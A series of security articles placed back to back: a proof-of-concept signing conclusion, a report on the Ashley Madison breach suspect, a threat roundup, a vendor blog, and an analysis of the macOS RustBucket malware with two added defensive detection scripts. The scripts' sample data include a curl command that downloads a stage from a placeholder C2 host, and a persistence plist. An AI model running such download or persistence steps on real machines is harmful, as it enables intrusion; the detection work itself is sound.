Finally, commercial software is cryptographically signed, so why not PoCs? PoCs hosted on GitHub can have their git commits signed with an individual's PGP key. This additional level of verification gives trusted researchers a way to show that the tools they publish can be trusted by the wider Information Security community. Additionally, a web-of-trust model for GitHub, where users vouch for a researcher's PoCs, presents an interesting possibility to be explored.

Conclusion

As attacks become increasingly complex, the tools used to dissect and reveal the inner workings of campaigns themselves will likely be targeted. Understanding how these tools can be used beyond their intended functionality is critical to identifying advanced attacks against a given organization or group. Threat modeling the environment security research is being conducted in should ultimately be done to protect the researcher and their organization. Just as these practices are applied to enterprise organizations, they should filter down to the individual researcher.


Top Suspect in 2015 Ashley Madison Hack Committed Suicide in 2014

When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users, the company’s then-CEO Noel Biderman was quick to point the finger at an unnamed former contractor. But as a new documentary series on Hulu reveals [SPOILER ALERT!], there was just one problem with that theory: Their top suspect had killed himself more than a year before the hackers began publishing stolen user data.

The new documentary, The Ashley Madison Affair, begins airing today on Hulu in the United States and on Disney+ in the United Kingdom. The series features interviews with security experts and journalists, Ashley Madison executives, victims of the breach and jilted spouses.

The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock, a data scientist who worked with the show’s producers at the Warner Bros. production company Wall to Wall Media. Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015.

Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach. That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti-Semitic and far-right groups online in the months leading up to the hack.

Whoever hacked Ashley Madison had access to all employee emails, but they only released Biderman's messages — three years' worth. Apropos of my retrospective report, Bullock found that a great many messages in Biderman's inbox were belligerent and anti-Semitic screeds from a former Ashley Madison employee named William Brewster Harrison.

William Harrison’s employment contract with Ashley Madison parent Avid Life Media.

The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online, but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service.

There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison.

Ashley Madison’s parent company — Toronto-based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner. But after being informed that Bradshaw was not subject to Canadian trademark laws, Avid Life offered to buy AshleyMadisonSucks.com for $10,000.

When Bradshaw refused to sell the domain, he and his then-girlfriend were subject to an unrelenting campaign of online harassment and blackmail. It now appears those attacks were perpetrated by Harrison, who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw, his then-girlfriend and their friends.

[As the documentary points out, the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison, which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy].

Harrison even went after Bradshaw’s lawyer and wife, listing them both on a website he created called Contact-a-CEO[.]com, which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way. The site also claimed to include the names, addresses and phone numbers of top CEOs.

A cached copy of Harrison’s website, contact-the-ceo.com.

An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash-a-Business[.]com, which Harrison dedicated to “all those sorry ass corporate executives out there profiting from your hard work, organs, lives, ideas, intelligence, and wallets.” Copies of the site at archive.org show it was the work of someone calling themselves “The Chaos Creator.”

Will Harrison was terminated as an Ashley Madison employee in November 2011, and by early 2012 he’d turned his considerable harassment skills squarely against the company. Ashley Madison’s long-suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison’s internal systems suggesting that a large percentage of the female accounts on the service were computer-operated bots.

Ashley Madison’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online. In one exchange on Aug. 16, 2012, Ashley Madison’s director of IT was asked to produce a list of all company employees with all-powerful administrator access.

“Who or what is asdfdfsda@asdf.com?,” Biderman asked, after being sent a list of nine email addresses.

“It appears to be the email address Will used for his profiles,” the IT director replied.

“And his access was never shut off until today?,” asked the company’s general counsel Mike Dacks.

A Biderman email from 2012.

What prompted the data scientist Bullock to reach out were gobs of anti-Semitic diatribes from Harrison, who had taken to labeling Biderman and others “greedy Jew bastards.”

“So good luck, I’m sure we’ll talk again soon, but for now, Ive got better things in the oven,” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated. “Just remember I outsmarted you last time and I will outsmart and out maneuver you this time too, by keeping myself far far away from the action and just enjoying the sideline view, cheering for the opposition.”

A 2012 email from William Harrison to former Ashley Madison CEO Noel Biderman.

Harrison signed his threatening missive with the salutation, “We are legion,” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers.

The leaked Biderman emails show that Harrison made good on his threats, and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti-Semitic language.

But on Mar. 5, 2014, Harrison committed suicide by shooting himself in the head with a handgun. This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed.

Does Harrison’s untimely suicide rule him out as a suspect in the 2015 hack? Who is The Chaos Creator, and what else transpired between Harrison and Ashley Madison prior to his death? We’ll explore these questions in Part II of this story, to be published early next week.

The Good, the Bad and the Ugly in Cybersecurity – Week 27

The Good | Authorities Arrest Alleged Ringleader of Major Cybercrime Organization

After pocketing as much as $30 million in stolen funds over the course of four years, a suspected senior member of the OPERA1ER cybercrime organization has been arrested in Cote d’Ivoire. The arrest was carried out as part of Interpol’s Operation Nervone with cooperation across local and international law enforcement agencies as well as cybersecurity researchers.

OPERA1ER, aka BlueBottle, NX$M$, DESKTOP Group, or Common Raven, is infamous for over 30 attacks spanning 15 countries in Africa, Asia, and Latin America. According to Interpol, they are a highly mature criminal organization focused on targeting financial institutions and mobile banking services with mass business email compromise (BEC) and malware campaigns.

Source: Group-IB

Based on recent security findings, BEC scams continue to soar. These scams are a sophisticated form of cyber fraud where attackers impersonate legitimate business email accounts to deceive recipients and either initiate fraudulent transactions or gain unauthorized access to sensitive information. Last year alone, IC3 received over 20,000 BEC-related complaints with adjusted losses amounting to over $2.7 billion.

OPERA1ER gains an initial level of compromise through well-crafted spear phishing emails embedded with remote access trojans (RATs), keyloggers, and password stealers. Noted in previous attacks, OPERA1ER emails are in French and often reuse tax office and job hiring language. After breaking in, the group is known to use tools like Cobalt Strike and Metasploit to establish persistence.

The success of Operation Nervone is the result of extensive collaboration between law enforcement agencies and the cybersecurity researchers at Orange-CERT-CC and Group-IB, who first published a report on OPERA1ER late last year. The operation underscores the importance of exchanging threat intelligence and working collectively to bring down high-profile, organized cybercrime syndicates.

The Bad | High-Severity Vulnerability In Cisco Switches Allows Attackers to Modify Encrypted Traffic

Cisco has issued a security advisory this week warning customers about a new, high-severity vulnerability that allows attackers to tamper with encrypted traffic in some data center switches.

Identified as CVE-2023-20185, the vulnerability was found during internal security testing and impacts Cisco Nexus 9332C, 9354C, and 9500 spine switches equipped with a Cisco Nexus N9K-X9736C-FX Line Card, operating in application centric infrastructure (ACI) mode, running firmware 14.0 or later, and that have the CloudSec encryption feature enabled. ACI mode is most typically used in data centers for controlling both physical and virtual networks.

Source: Cisco Security

The vulnerability stems from an issue in the implementation of ciphers leveraged by the CloudSec encryption feature on affected switches. Exploitation of CVE-2023-20185 occurs when an attacker intercepts the traffic and uses cryptanalytic techniques to bypass encryption between two ACI sites.

If exploited, attackers can gain unauthenticated access and either read or tamper with intersite encrypted traffic between the remote sites. Further, successful exploitation enables adversaries to access data that allows them to move laterally across the compromised network.

So far, Cisco's Product Security Incident Response Team (PSIRT) says it has no indications of active exploitation or public proofs of concept (PoCs) targeting the vulnerability. However, there are no software upgrades to address the vulnerability. This is a developing situation, and customers can minimize the risks of unauthorized access and data manipulation by disabling the ACI multi-site CloudSec encryption feature immediately and contacting Cisco support to discuss alternative options.

The Ugly | BlackCat Ransomware Runs Malvertising Campaigns By Cloning Popular File Transfer App

This week, cybersecurity researchers uncovered several malvertising campaigns designed to spread malware-laden installers to unsuspecting WinSCP users. WinSCP is an open-source and free SFTP, FTP, WebDAV, S3 and SCP client, and file manager for Windows that boasts over 201 million downloads and counting. The campaign has since been attributed to the notorious BlackCat ransomware group (aka ALPHV).

Malvertising (malicious advertising) is delivered through legitimate online advertising networks and platforms. These advertisements appear as regular ads on websites, but contain malicious links and code that infects users’ devices with malware. Upon interaction, users are redirected to attacker-controlled websites or prompted to download the malware. Malvertising takes advantage of the trust placed in reputable brands and advertising networks, making it difficult for users to identify the threat.

In the recent BlackCat campaigns, the group used WinSCP specifically to lure IT professionals and web and systems administrators in order to obtain initial access to valuable target networks. Researchers discovered ads promoting fake WinSCP sites on both Google and Bing search pages. The spoofed WinSCP sites prompted visitors to download the app, hiding behind domain names very similar to the real WinSCP website. Further interaction then installed a trojanized DLL file containing a Cobalt Strike beacon that connected to a C2 server.

Source: Trend Micro

Attacks due to malvertising continue to increase, and have recently been seen spreading a new macOS variant of Atomic Stealer, stealing AWS logins, and distributing virtualized .NET malware loaders. Businesses can prevent malvertising attacks by using firewall controls and web filters to block access to known malicious websites, implementing ad-blocking software to prevent ads from being displayed, and deploying endpoint protection software to prevent and detect the execution of malicious code delivered through malicious adverts.

Cybersecurity In The Fast Lane | Why Speed Is Key In Incident Response & Mitigation

Threat actors are constantly evolving, consistently developing the tactics, techniques, and procedures (TTPs) they use in attacks. In today's threat landscape, enterprises of all sizes and industries find themselves pitted against professional cybercriminal gangs, advanced persistent threat (APT) groups, and even nation-state actors – all of whom are leveraging faster attack methods than ever before.

In addition to sophisticated TTPs and how organized many cybercrime-as-a-service models have become, enterprises also face the reality of how quickly active threats can become full-blown incidents. Speed, in both cybersecurity and cyberattacks, is the key metric to pay attention to as it defines the success of either the attacker or the defender.

This blog discusses the metric of speed in context of modern threat actors, their methods, and how enterprise security teams can shave off critical seconds and minutes in their own detection and response processes.

Threat Actors Are Picking Up Their Speed

Technology has changed dramatically in the last few years alone, becoming smarter, faster, and more advanced. While enterprises use the latest software and tools to further their businesses, threat actors have done the same to level up their attack methods.

Ransomware Attacks

Consider one of the most significant takeaways from Mandiant's latest M-Trends report: the global median dwell time – the time between the beginning of an intrusion and the moment it is identified – is dropping year over year. At a mere 16 days for 2022, this may seem like a positive development, as threat actors are spending less time inside a system post-entry. However, skyrocketing counts of ransomware attacks on global businesses give a good indication as to why dwell times are on the decline.

Though some of the reduction in dwell time is attributed to improved detection and response capabilities, ransomware has become a digital pandemic, targeting victims in all industry verticals. Given its high earning potential for a relatively short attack time frame, ransomware is highly lucrative for threat actors, and security experts project that these attacks will continue rising in both frequency and severity.

Drive-By Download Attacks

As their name suggests, drive-by downloads are stealthy, fast, and often happen before the victim even knows what’s happening. This type of cyberattack is employed by cybercriminals to infect a victim’s device with malware without their knowledge or consent. It typically occurs when they visit a compromised website or click on a malicious link embedded in an email or advertisement.

The attack then takes advantage of vulnerabilities in web browsers, plugins, or operating systems, allowing the malware to be automatically downloaded and executed on the victim’s device. Drive-by downloads require only the bare minimum of a victim’s interaction, making them a potent tool for spreading malware, stealing sensitive information, and gaining unauthorized access to systems.

Mass Scanning For Vulnerabilities

Based on new research, security defenders have a real race against the clock to patch new vulnerabilities. Researchers have found that threat actors start to perform mass, internet-wide scans for vulnerable endpoints within just 15 minutes after a new CVE is disclosed. Threat actors consistently monitor vendor bulletins and software update channels for the latest announcements on vulnerabilities and proof of concepts that they can leverage in their next attack. Oftentimes, these fresh vulnerabilities provide them with the capability to perform remote code execution (RCE) and gain access to corporate networks.

Patch management is a continuous and, for many organizations, arduous task that requires security teams to try to keep up with all the latest security threats and issues across various operating systems. Since performing these internet-wide scans does not require a deep skill set, even low-level criminals are able to take advantage, sometimes even selling their scan results to more experienced actors.

Zero-Day Exploits

Threat actors are gaining momentum on how quickly they can exploit zero-days. In a recent Vulnerability Intelligence Report, researchers cited time-to-exploit as being the critical metric for security practitioners. Over the past three years, the time measured between disclosure and known exploitation has decreased steadily, going from 30% of vulnerabilities exploited in the wild within one week in 2020 to 56% found exploited within one week in 2022. Zero-days are most often exploited to provide initial access for ransomware gangs.

Growing Availability of Off-The-Shelf-Tools

Apart from APT groups, full-fledged ransomware gangs, and nation-backed threat actors, low-level cybercriminals are taking their shot on enterprises due to the widening availability of ready-to-use hacking tools. These tools, including exploit kits, infostealers, scanners, password crackers, and attack simulation tools, are commonly available on forums and darknet markets and significantly lower the barrier to launching serious cyberattacks.

As the market for selling pre-made tools continues to expand, cybercriminals with little to no technical expertise are now able to quickly find and purchase pre-existing scripts to launch attacks on computer systems and networks.

Deciphering How Actors Move Across The Cyber Attack Lifecycle

Though cyber threat actors are moving swiftly, there are ways for enterprise businesses to stay ahead and safeguard their critical data and systems. Understanding how actors maneuver before and during their attacks allows defenders to put the right safeguards in place.

  • Planning Phase – Before the attack itself, threat actors select their target and work to identify exploitable aspects of its operations. This refers to any low-hanging fruit such as unpatched vulnerabilities, misconfigurations, administrative users on unprotected devices, and more.
  • Initial Intrusion – Based on the findings from the planning phase, threat actors tailor their intrusion technique based on the weaknesses of their victims.
  • Enumeration Phase – Once inside, threat actors move fast to situate themselves within the system, understand the limits of their current permissions, and establish an estimate on what privileges they require to start moving laterally. Time is of the essence in this phase as actors start to establish their foothold and upgrade their access.
  • Lateral Movement – Using their new credentials, the actors are able to spread deep into the affected system. Here, their main goal is to distribute their malware/toolset, exfiltrating and encrypting data as they go.
  • Objective Completion – After deleting or corrupting backups and local files, actors prepare to ransom their victim.

Based on the cyberattack lifecycle, the intrusion and enumeration phases open up a critical window for proactive action by cyber defenders. During these initial stages, the attackers have not yet deeply infiltrated the compromised network or blended in with normal network traffic. If a threat actor manages to make it to the lateral movement phase, detection becomes much more challenging. Threat actors use evasion tactics to avoid detection, embedding themselves deeply within the network. Living-off-the-land techniques are most often used in this phase, leveraging legitimate processes and tools already present in the environment to strengthen their foothold.

Since the time span between intrusion and lateral movement is rapidly shrinking as threat actors become more sophisticated and well-equipped, the primary goal for cyber defenders is to focus on detecting the first signs of compromise during the enumeration phase and isolating the threat before it can cause significant damage.

Autonomous Tools Take the Toil Out of Triage

Managing such a challenge, however, is often beyond the resources of a security team tasked with manual triage of a flood of alerts and uncontextualized event data. That’s why autonomous, AI-powered EDR and XDR solutions are the new go-to tools for analysts, threat hunters and incident responders alike.

A modern security tool like SentinelOne Singularity not only autonomously deals with known malware threats – from detection right through to mitigation and even rollback in the case of a ransomware attack that gets through – but also provides incident responders with contextualized data to tackle targeted attacks.

With automated contextual enrichment from tools such as Singularity XDR, IR teams can take advantage of insights from aggregated event information that combines all related data gathered from multiple tools and services into a single ‘incident’, without adding extra tools or more people. Out-of-the-box integrations and pre-tuned detection mechanisms across the security stack help improve productivity, threat detection, and forensics.

SentinelOne Vigilance Respond | Our Approach to Managed Detection & Response (MDR)

While powerful, such tools can be supplemented by Managed Detection and Response services for an even higher level of security. Organizations across the globe rely on SentinelOne’s Managed Detection and Response (MDR) service, Vigilance Respond, to stop threat actors from reaching the lateral movement stage in attacks. Utilizing SentinelOne Singularity, Vigilance Respond defends networks against cyberattacks instantly and monitors customer environments 24/7/365, hunting for advanced threats and providing faster mean-time-to-response (MTTR) rates.

Vigilance Respond works by providing machine-speed detection technology run by dedicated analysts working around-the-clock. It also allows organizations to adapt instantly, and at scale, in today’s ever-shifting threat landscape, closing the gap between intrusion and lateral movement and neutralizing the threat actor before they can begin to spread deep into a target’s systems.

Vigilance Respond offers these services to ensure businesses are safeguarded:

  • Active threat campaign hunting for APTs
  • Alerting and remediation guidance for emerging threats
  • Incident-based triage and hunting
  • 24/7/365 monitoring, triage, and response
  • Security Assessment (Vigilance Respond Pro)
  • Digital Forensics Investigation & Malware Analysis (Vigilance Respond Pro)

Conclusion

In the realm of cybersecurity, speed matters. It can be the deciding factor between successfully thwarting an attack or suffering substantial damage. As technology evolves and threat actors become more adept at exploiting vulnerabilities, enterprise leaders are investing in strategies focused on swift and proactive cybersecurity response measures.

Ultimately, speed in cybersecurity is about staying one step ahead of the adversaries. It requires a proactive approach, continuous monitoring, and real-time threat intelligence. By prioritizing speed, organizations can enhance their ability to detect, respond to, and mitigate cyber threats, ensuring a stronger and more resilient security posture.

Learn more about how SentinelOne Singularity and Vigilance Respond can help safeguard your business by contacting us or requesting a demo.


BlueNoroff | How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection

Back in April, researchers at JAMF detailed a sophisticated APT campaign targeting macOS users with multi-stage malware that culminated in a Rust backdoor capable of downloading and executing further malware on infected devices. ‘RustBucket’, as they labeled it, was attributed with strong confidence to the BlueNoroff APT, generally assumed to be a subsidiary of the wider DPRK cyber attack group known as Lazarus.

In May, ESET tweeted details of a second RustBucket variant targeting macOS users, followed in June by Elastic’s discovery of a third variant that included previously unseen persistence capabilities.

RustBucket is noteworthy for the range and type of anti-evasion and anti-analysis measures seen in various stages of the malware. In this post, we review the multiple malware payloads used in the campaign and highlight the novel techniques RustBucket deploys to evade analysis and detection.

RustBucket Stage 1 | AppleScript Dropper

The attack begins with an Applet that masquerades as a PDF Viewer app. An Applet is simply a compiled AppleScript that is saved in a .app format. Unlike regular macOS applications, Applets typically lack a user interface and function merely as a convenient way for developers to distribute AppleScripts to users.

The threat actors chose not to save the script as run-only, which allows us to easily decompile it with the built-in osadecompile tool (this is, effectively, what Apple’s GUI Script Editor runs in the background when viewing compiled scripts).

Stage 1 executes three ‘do shell script’ commands to set up Stage 2

The script contains three do shell script commands, which serve to download and execute the next stage. In the variant described by JAMF, this was a barebones PDF viewer called Internal PDF Viewer. We will forgo the details here, as previous researchers have already described it in depth.

Stage 1 writes the second stage to the /Users/Shared/ folder, which requires no special permissions and is accessible to malware without having to circumvent TCC. The Stage 1 variant described by Elastic differs in that it writes the second stage as a hidden file to /Users/Shared/.pd.

Stage 1 is easily the least sophisticated and most easily detected part of the attack chain. The arguments of the do shell script commands should appear in the Mac’s unified logs and in the output of command line tools such as the ps utility.

The success of Stage 1 relies heavily on how well the threat actor employs social engineering. In the case described by JAMF, the threat actors used an elaborate ruse: an “internal” PDF reader was supposedly required to read a confidential or ‘protected’ document. Victims were induced to execute Stage 1 believing it could open the PDF they had received. In fact, Stage 1 was only a dropper, designed to protect Stage 2 should anyone without the malicious PDF stumble on it.
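The detection opportunity just described can be turned into a simple triage check over a process listing. The script below is an added example, not code from the original post or from SentinelOne: it parses `ps -axo ppid,pid,args` output and flags the three Stage 1 traits the post names (a shell spawned by a compiled AppleScript applet, a hidden file under /Users/Shared, and an application bundle executing from /Users/Shared). The sample listing embedded in it is constructed for illustration and the URL in it is a placeholder.

```python
"""Triage a process listing for the Stage 1 traits described above."""
import re

# Constructed sample of `ps -axo ppid,pid,args` output. These lines are illustrative
# only, not real output from an infected host; the URL is a placeholder.
SAMPLE_PS = """\
 PPID   PID ARGS
    1   412 /usr/sbin/cfprefsd agent
    1   520 /System/Applications/TextEdit.app/Contents/MacOS/TextEdit
  401   833 /Users/Shared/Internal PDF Viewer.app/Contents/MacOS/applet
  833   840 sh -c curl -s -o /Users/Shared/.pd https://c2.placeholder.invalid/stage2
  401   900 -zsh
"""

LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(.+?)\s*$")
# sh/bash/zsh, with or without a path, possibly as a login shell ("-zsh").
SHELL_RE = re.compile(r"^(?:/bin/|/usr/bin/)?-?(?:sh|bash|zsh)(?:\s|$)")
# Compiled AppleScript applets run from a stub executable literally named "applet".
APPLET_MARKER = "/Contents/MacOS/applet"
# A dot-file directly under /Users/Shared (Elastic's variant wrote /Users/Shared/.pd).
HIDDEN_SHARED_RE = re.compile(r"/Users/Shared/\.[^\s/]+")
# Any application bundle executing from the permission-free /Users/Shared folder.
APP_IN_SHARED_RE = re.compile(r"/Users/Shared/.*?\.app/")


def parse_ps(text):
    """Turn `ps -axo ppid,pid,args` output into a list of {ppid, pid, args} dicts."""
    procs = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:  # the header line has no numeric columns and is skipped
            procs.append({"ppid": int(match.group(1)),
                          "pid": int(match.group(2)),
                          "args": match.group(3)})
    return procs


def triage(procs):
    """Return (pid, reason, args) tuples for processes matching the Stage 1 profile."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for proc in procs:
        args = proc["args"]
        parent = by_pid.get(proc["ppid"])
        if SHELL_RE.match(args) and parent and APPLET_MARKER in parent["args"]:
            findings.append((proc["pid"], "shell spawned by an AppleScript applet", args))
        if HIDDEN_SHARED_RE.search(args):
            findings.append((proc["pid"], "hidden file referenced under /Users/Shared", args))
        if APP_IN_SHARED_RE.search(args):
            findings.append((proc["pid"], "application running from /Users/Shared", args))
    return findings


if __name__ == "__main__":
    for pid, reason, args in triage(parse_ps(SAMPLE_PS)):
        print(f"pid {pid}: {reason}\n    {args}")
```

Run against a live listing, the same three rules pick up the applet, the shell it spawns and the hidden drop location; the parent/child check matters because a bare `sh -c curl` is common, whereas a shell whose parent is an applet stub is not.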

RustBucket Stage 2 | Payloads Written in Swift and Objective-C

We have found a number of different Stage 2 payloads, some written in Swift, some in Objective-C, and both compiled for Intel and Apple silicon architectures (see IoCs at the end of the post). The sizes and code artifacts of the Stage 2 samples vary; the universal ‘fat’ binaries range between 160KB and 210KB.

Samples of RustBucket Stage 2 vary in size

Across the samples, various username strings can be found. Those we have observed in Stage 2 binaries so far include:

/Users/carey/
/Users/eric/
/Users/henrypatel/
/Users/hero/

Despite the differences in size and code artifacts, the Stage 2 payloads have in common the task of retrieving Stage 3 from the command and control server. The Stage 2 payload requires a specially crafted PDF to unlock the code path that downloads Stage 3; the PDF also provides an XOR key used to decode the obfuscated C2 address appended to the end of the PDF.

In some variants, this logic is implemented in the downAndExecute function, as described by previous researchers; in others, we note that the download of the next stage is performed in the aptly named down_update_run function. This function itself varies across samples. In b02922869e86ad06ff6380e8ec0be8db38f5002b, for example, it runs a hardcoded command via system().

Stage 2 executes a shell command via the system() call to retrieve and run Stage 3

However, the same function in other samples (e.g., d5971e8a3e8577dbb6f5a9aad248c842a33e7a26) uses NSURL APIs and entirely different logic.

Code varies widely among samples, possibly suggesting different developers

Researchers at Elastic further noted that in one newer variant of Stage 2 written in Swift, the User-Agent string is all lowercase, whereas in the earlier Objective-C samples it is not.

User-Agent string is subtly changed from the Objective-C to Swift versions of Stage 2

Although user agent strings are not inherently case sensitive, if this was a deliberate change it is possible the threat actors parse the user agent string on the server side to weed out unwanted calls to the C2.

In the most recent samples, the payload retrieved by Stage 2 is written to disk as “ErrorCheck.zip” in _CS_DARWIN_USER_TEMP (aka $TMPDIR, typically /var/folders/…/../T/) before being executed on the victim’s device.

RustBucket Stage 3 | New Variant Drops Persistence LaunchAgent

The Stage 3 payload has so far been seen in two distinct variants:

  • A: 182760cbe11fa0316abfb8b7b00b63f83159f5aa (file name: Stage3)
  • B: b74702c9b82f23ebf76805f1853bc72236bee57c (file names: ErrorCheck, System Update)

Both variants are Mach-O universal binaries compiled from Rust source code. Variant A is considerably larger than B, with the universal binary of the former weighing in at 11.84MB versus 8.12MB for variant B. The slimmed-down newer variant imports far fewer crates and makes less use of the sysinfo crate found in both. Notably, variant B does away with the webT class seen in variant A, which gathered environmental information and checked for execution in a virtual machine by querying the SPHardwareDataType value of system_profiler.

The webT class appears in variant A of the Stage 3 payload

However, variant B has not scrubbed all webT artifacts from the code, and a reference to the missing module can still be found in the strings.

18070 0x0032bdf4 0x10032bdf4 136 137 ascii /Users/carey/Dev/MAC_DATA/MAC/Trojan/webT/target/x86_64-apple-darwin/release/deps/updator-7a0e7515c124fac6.updator.ab9d0eaa-cgu.0.rcgu.o
A string referencing the missing webT module can still be found in Stage 3 variant B

The substring “Trojan”, which does not appear in earlier variants, is also found in the file path referenced by the same string.

Importantly, variant B contains a persistence mechanism that was not present in the earlier versions of RustBucket. This takes the form of a hardcoded LaunchAgent, which is written to disk at ~/Library/LaunchAgents/com.apple.systemupdate.plist. The ErrorCheck file also writes a copy of itself to ~/Library/Metadata/System Update and serves as the target executable of the LaunchAgent.

Since Stage 3 requires a URL as a launch parameter, this is provided in the property list as a Program Argument. Curiously, the URL passed to ErrorCheck on launch is appended to this hardcoded URL in the LaunchAgent plist.

RustBucket LaunchAgent concatenates the hardcoded URL with the one supplied at launch

Appending the supplied value to the hardcoded URL can be clearly seen in the code, though whether this is an error or accounted for in the way the string is parsed by the binary we have yet to determine.
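The persistence plist described above has several traits that a defender can check for mechanically: an Apple-looking label sitting in a user’s LaunchAgents folder, a target executable in ~/Library/Metadata rather than a normal program location, and a URL handed to the binary as a launch argument. The script below is an added example, not code from the original post or from SentinelOne; it audits every plist in a home directory’s Library/LaunchAgents with plistlib. The sample home it builds is constructed for illustration from the label and paths the post gives, and the URL in it is a placeholder since the post does not publish the hardcoded one.

```python
"""Audit a user's Library/LaunchAgents for the traits of RustBucket's persistence plist."""
import os
import plistlib
import re
import tempfile

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# System-wide locations where a LaunchAgent's target binary is ordinarily found.
SYSTEM_PREFIXES = ("/Applications/", "/System/", "/Library/", "/usr/", "/bin/", "/sbin/", "/opt/")


def audit_launch_agent(path, home):
    """Return a list of findings for one plist; an empty list means nothing stood out."""
    with open(path, "rb") as fh:
        try:
            plist = plistlib.load(fh)
        except plistlib.InvalidFileException as exc:
            return [f"unparseable plist: {exc}"]

    findings = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    program = str(plist.get("Program") or (args[0] if args else ""))

    # Apple installs its own agents under /System/Library/LaunchAgents, never in a
    # user's ~/Library/LaunchAgents, so a com.apple.* label there is out of place.
    if label.startswith("com.apple."):
        findings.append(f"Apple-style label in user domain: {label}")

    # Per-user programs normally live under ~/Applications or ~/Library/Application Support;
    # RustBucket drops its copy in ~/Library/Metadata, a directory owned by Spotlight.
    user_prefixes = (
        os.path.join(home, "Applications") + os.sep,
        os.path.join(home, "Library", "Application Support") + os.sep,
    )
    if program and not program.startswith(SYSTEM_PREFIXES + user_prefixes):
        findings.append(f"program in unusual location: {program}")

    # A URL passed to the binary on every launch is rare for legitimate agents and is
    # how RustBucket's plist tells Stage 3 where to call home.
    for arg in args[1:]:
        if URL_RE.search(arg):
            findings.append(f"URL passed as launch argument: {arg}")

    # Legitimate plists are almost always named after their Label.
    if label and os.path.basename(path) != label + ".plist":
        findings.append(f"filename does not match label {label}")
    return findings


def audit_launch_agents(home):
    """Audit every plist in <home>/Library/LaunchAgents; returns {filename: findings}."""
    agents_dir = os.path.join(home, "Library", "LaunchAgents")
    report = {}
    if not os.path.isdir(agents_dir):
        return report
    for name in sorted(os.listdir(agents_dir)):
        if name.endswith(".plist"):
            report[name] = audit_launch_agent(os.path.join(agents_dir, name), home)
    return report


def build_sample_home():
    """Create a throwaway home directory holding one RustBucket-like and one benign agent."""
    home = tempfile.mkdtemp(prefix="launchagent-audit-")
    agents = os.path.join(home, "Library", "LaunchAgents")
    os.makedirs(agents)
    # Constructed from the post's description: label and paths from the IoCs, URL a placeholder.
    malicious = {
        "Label": "com.apple.systemupdate",
        "ProgramArguments": [
            os.path.join(home, "Library", "Metadata", "System Update"),
            "https://c2.placeholder.invalid/",  # placeholder, not the real hardcoded URL
        ],
        "RunAtLoad": True,
    }
    benign = {
        "Label": "com.example.helper",
        "ProgramArguments": [os.path.join(home, "Library", "Application Support", "Example", "helper")],
        "RunAtLoad": True,
    }
    for item in (malicious, benign):
        with open(os.path.join(agents, item["Label"] + ".plist"), "wb") as fh:
            plistlib.dump(item, fh)
    return home


if __name__ == "__main__":
    for name, findings in audit_launch_agents(build_sample_home()).items():
        print(name, "->", findings or ["clean"])
```

On a real host, call `audit_launch_agents(os.path.expanduser("~"))`; the heuristics are deliberately conservative (label domain, program location, URL argument, filename/label mismatch) so that a hit is worth a human look rather than an automatic quarantine.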

Much of the malware functionality found in variant A’s webT methods is, in variant B, buried in the massive sym.updator::main function. This is responsible for surveilling the environment, parsing the arguments received at launch, processing commands, gathering disk information and more. The function is over 22KB and contains 501 basic blocks. Our analysis of it is ongoing, but aside from the functions previously described by Elastic, it also gathers disk information, including whether the host device’s disk is an SSD or the older, rotational platter type.

Among updator::main’s many tasks is gathering disk information

After gathering environmental information, the malware calls sym.updator::send_request to post the data to the C2 using the following User Agent string (this time not in lowercase):

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

The malware compares the response against two hardcoded values, 0x31 and 0x30.

Checking the values of the response from the C2

In the sample analyzed by Elastic, the researchers reported that 0x31 causes the malware to self-terminate while 0x30 allows the operator to drop a further payload in the _CS_DARWIN_USER_TEMP directory.

The choice of Rust and the complexity of the Stage 3 binaries suggest the threat actor was willing to invest considerable effort to thwart analysis of the payload. As the known C2s were unresponsive by the time we conducted our analysis, we were unable to obtain a sample of the next stage of the malware, but already at this point in the operation the malware has gathered a great deal of host information, enabled persistence and opened up a backdoor for further malicious activity.

SentinelOne Protects Against RustBucket Malware

SentinelOne Singularity protects customers from known components of the RustBucket malware. Attempts to install persistence mechanisms on macOS devices are also dynamically detected and blocked by the agent.

SentinelOne Agent User Interface Detects RustBucket malware
SentinelOne Singularity Console Detects RustBucket malware

Conclusion

The RustBucket campaign highlights that the threat actor, whom previous researchers have confidently attributed to DPRK’s BlueNoroff APT, has invested considerable resources in multi-stage malware aimed specifically at macOS users and is evolving its attempts to thwart analysis by security researchers.

The extensive effort made to evade analysis and detection in itself shows the threat actor is aware of the growing adoption of security software by organizations with macOS devices in their fleets, as security teams have increasingly begun to see the need for better protection than provided out-of-the-box. SentinelOne continues to track the RustBucket campaign and our analysis of the known payloads is ongoing.

